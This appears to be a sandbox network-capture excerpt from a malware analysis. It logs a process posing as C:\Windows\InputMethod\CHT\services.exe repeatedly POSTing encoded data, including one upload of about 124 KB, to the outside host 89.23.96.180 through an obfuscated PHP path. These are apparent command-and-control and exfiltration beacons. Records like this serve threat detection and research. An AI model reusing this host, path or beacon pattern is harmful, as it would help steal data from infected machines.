                                                              Dec 21, 2024 10:47:37.190109015 CET2536OUTData Raw: 58 53 43 51 5d 57 52 52 55 5e 55 5a 54 52 50 55 57 53 5c 5c 52 52 51 5d 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XSCQ]WRRU^UZTRPUWS\\RRQ]_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#,2 29Q*!:<;3$T-;%4?5]112($?==5!_.#Q,
                                                              Dec 21, 2024 10:47:38.213110924 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:38.446055889 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:37 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              8 | 192.168.2.5 | 49758 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:47:38.708815098 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:47:39.065128088 CET2536OUTData Raw: 58 54 46 52 5d 5a 57 54 55 5e 55 5a 54 53 50 5d 57 53 5c 54 52 5e 51 5b 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XTFR]ZWTU^UZTSP]WS\TR^Q[_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#91,R1=P=19[.?$/+98&4?6&&T( ?==5!_.#Q,


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              9 | 192.168.2.5 | 49761 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:47:39.904587984 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2112
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:47:40.252794027 CET2112OUTData Raw: 58 50 43 5f 5d 5d 57 52 55 5e 55 5a 54 59 50 56 57 5d 5c 5c 52 51 51 5e 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XPC_]]WRU^UZTYPVW]\\RQQ^_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY ./2->!-.;$$R-^945'2+'8(_*!_.#Q,.
                                                              Dec 21, 2024 10:47:41.281209946 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:41.514288902 CET | 349 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:41 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 39 38 0d 0a 0e 1e 39 1c 20 15 2e 0d 28 14 0d 5e 2a 3f 36 50 3d 3d 25 05 2c 22 34 07 21 02 26 10 3d 04 34 01 24 2e 09 58 23 2a 2e 04 36 3f 27 5f 3e 31 2e 58 01 1e 22 1a 21 20 3d 55 27 01 34 0b 29 19 3e 5a 2b 10 2a 13 24 06 33 19 32 39 24 58 3d 29 3c 55 26 3d 26 5c 3b 3f 33 5f 3c 3d 3c 56 24 1c 2b 51 03 1e 25 04 25 05 3b 57 24 23 35 5f 26 3d 21 14 37 2e 38 0d 2a 01 30 0b 20 2b 2e 19 3b 17 27 05 3c 3e 25 01 2a 38 3a 5a 27 3c 28 0c 32 14 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 989 .(^*?6P==%,"4!&=4$.X#*.6?'_>1.X"! =U'4)>Z+*$329$X=)<U&=&\;?3_<=<V$+Q%%;W$#5_&=!7.8*0 +.;'<>%*8:Z'<(2#T-,H1]V0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              10 | 192.168.2.5 | 49762 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:47:40.050755024 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:47:40.408865929 CET2536OUTData Raw: 58 56 43 52 58 5c 57 51 55 5e 55 5a 54 5a 50 57 57 5c 5c 5f 52 57 51 5c 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XVCRX\WQU^UZTZPWW\\_RWQ\_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#9!,%9P=.-#%/-" >&16T*'(+>4X+5!_.#Q,"
                                                              Dec 21, 2024 10:47:41.432554007 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:41.669713974 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:41 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              11 | 192.168.2.5 | 49768 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:47:41.929284096 CET | 398 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:47:42.283967018 CET2536OUTData Raw: 58 54 43 52 5d 5f 52 52 55 5e 55 5a 54 52 50 50 57 5a 5c 5f 52 5e 51 56 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XTCR]_RRU^UZTRPPWZ\_R^QV_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY .!(U$-)2"-/'-8S4:&"1?$Z+=^+%!_.#Q,
                                                              Dec 21, 2024 10:47:43.308073997 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:43.542351961 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:43 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              12 | 192.168.2.5 | 49774 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:47:44.385399103 CET | 398 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:47:44.737086058 CET2536OUTData Raw: 5d 55 46 52 5d 57 57 57 55 5e 55 5a 54 5e 50 55 57 5f 5c 5b 52 54 51 59 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]UFR]WWWU^UZT^PUW_\[RTQY_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#,"8&-!T*"*-/;0398 ?%1"*7#Z>-8^*5!_.#Q,2
                                                              Dec 21, 2024 10:47:45.765592098 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:46.001621008 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:45 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              13 | 192.168.2.5 | 49778 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:47:46.073050976 CET | 444 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: multipart/form-data; boundary=----zeihSAIObDfjW2EHuTgVjvpXZJn4D45Jgo
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 124358
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:47:47.459249020 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:48.051790953 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:47 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0
                                                              Dec 21, 2024 10:47:48.053524971 CET | 398 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2112
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:47:48.514823914 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:49.070000887 CET | 349 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:48 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 39 38 0d 0a 0e 1e 3a 0e 21 2b 3d 53 28 29 3f 10 3d 3f 3a 1d 2a 3d 25 00 2c 1c 05 17 22 3c 32 13 2a 3e 3f 10 27 00 3b 59 23 2a 32 02 36 11 2f 1d 29 0b 2e 58 01 1e 21 0b 23 55 29 57 33 3f 23 57 2a 0e 3a 5e 3c 2e 0f 04 24 3f 23 50 32 3a 12 5f 28 2a 28 1e 26 03 3e 5b 38 2f 0d 5a 28 10 20 1d 27 1c 2b 51 03 1e 26 1f 31 2c 05 56 31 0a 35 5a 25 00 00 00 22 2d 27 55 3f 3b 2c 08 23 15 2e 5c 2c 00 3c 58 3f 04 3e 11 2a 2b 32 13 33 5a 37 55 24 2e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 98:!+=S()?=?:*=%,"<2*>?';Y#*26/).X!#U)W3?#W*:^<.$?#P2:_(*(&>[8/Z( '+Q&1,V15Z%"-'U?;,#.\,<X?>*+23Z7U$.#T-,H1]V0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              14 | 192.168.2.5 | 49779 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:47:46.291668892 CET | 398 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:47:46.643245935 CET | 2536 | OUT | Data: [encoded request body]
                                                              Dec 21, 2024 10:47:47.667426109 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:47.906095028 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:47 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              15 | 192.168.2.5 | 49785 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:47:48.151933908 CET | 398 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:47:48.502629042 CET | 2536 | OUT | Data: [encoded request body]
                                                              Dec 21, 2024 10:47:49.538532972 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:49.774282932 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:49 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              16 | 192.168.2.5 | 49791 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:47:50.010797024 CET | 398 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:47:50.362039089 CET | 2536 | OUT | Data: [encoded request body]
                                                              Dec 21, 2024 10:47:51.387914896 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:51.625848055 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:51 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              17 | 192.168.2.5 | 49797 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:47:51.869127989 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:47:52.221350908 CET | 2536 | OUT | Data: [encoded request body]
                                                              Dec 21, 2024 10:47:53.246582985 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:53.481827021 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:53 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              18 | 192.168.2.5 | 49803 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:47:53.730128050 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2532
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:47:54.080955029 CET | 2532 | OUT | Data: [encoded request body]


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              19 | 192.168.2.5 | 49804 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:47:54.204754114 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2112
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:47:54.549540997 CET | 2112 | OUT | Data: [encoded request body]
                                                              Dec 21, 2024 10:47:55.581733942 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:55.816329956 CET | 349 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:55 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 39 38 0d 0a 0e 1e 39 54 37 15 29 57 3f 03 37 1d 3d 2c 26 50 3e 2e 2a 14 2f 31 30 02 21 02 3e 12 2a 2d 3f 58 26 3e 23 5c 22 3a 25 11 22 01 0d 59 2a 31 2e 58 01 1e 22 1c 34 0d 25 1e 24 06 2f 1c 29 09 32 5d 28 00 22 10 30 3f 23 57 32 14 12 5f 3f 2a 27 0c 32 3d 0c 10 38 2f 28 03 2b 10 28 55 27 36 2b 51 03 1e 26 59 26 05 3b 53 31 0d 1c 07 26 3d 21 59 22 3e 01 56 2a 28 01 51 37 38 3d 05 2f 29 0a 5f 29 2d 2a 5c 2a 06 2d 06 24 2f 2b 53 31 2e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 989T7)W?7=,&P>.*/10!>*-?X&>#\":%"Y*1.X"4%$/)2]("0?#W2_?*'2=8/(+(U'6+Q&Y&;S1&=!Y">V*(Q78=/)_)-*\*-$/+S1.#T-,H1]V0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              20 | 192.168.2.5 | 49805 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:47:54.333041906 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2532
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:47:54.690097094 CET | 2532 | OUT | Data: [encoded request body]
                                                              Dec 21, 2024 10:47:55.708646059 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:55.942177057 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:55 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              21 | 192.168.2.5 | 49811 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:47:56.185380936 CET | 398 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:47:56.534126997 CET | 2536 | OUT | Data: [encoded request body]
                                                              Dec 21, 2024 10:47:57.562369108 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:57.801831961 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:57 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              22 | 192.168.2.5 | 49816 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
